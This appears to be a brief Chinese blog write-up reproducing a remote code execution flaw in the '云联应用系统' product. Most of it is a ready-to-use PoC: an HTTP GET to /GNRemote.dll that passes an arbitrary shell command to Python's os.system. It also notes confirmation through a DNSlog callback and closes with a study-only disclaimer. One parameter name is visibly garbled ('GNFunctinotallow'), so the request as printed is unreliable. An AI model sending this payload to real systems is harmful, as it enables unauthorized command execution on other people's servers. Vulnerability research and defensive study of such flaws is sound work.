云联应用系统RCE漏洞复现_HTTP


云联应用系统RCE漏洞复现_User_02


Poc

GET /GNRemote.dll?GNFunctinotallow=CallPython&pyFile=os&pyFunc=system&pyArgu=执行的命令 HTTP/1.1

Host:

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close



RCE漏洞利用


云联应用系统RCE漏洞复现_User_03


DNSlog回显验证漏洞利用成功

云联应用系统RCE漏洞复现_User_04


云联应用系统RCE漏洞复现_HTTP_05

文章只供学习交流,不允许有任何违法行为,如作他用所承受的法律责任一概与作者无关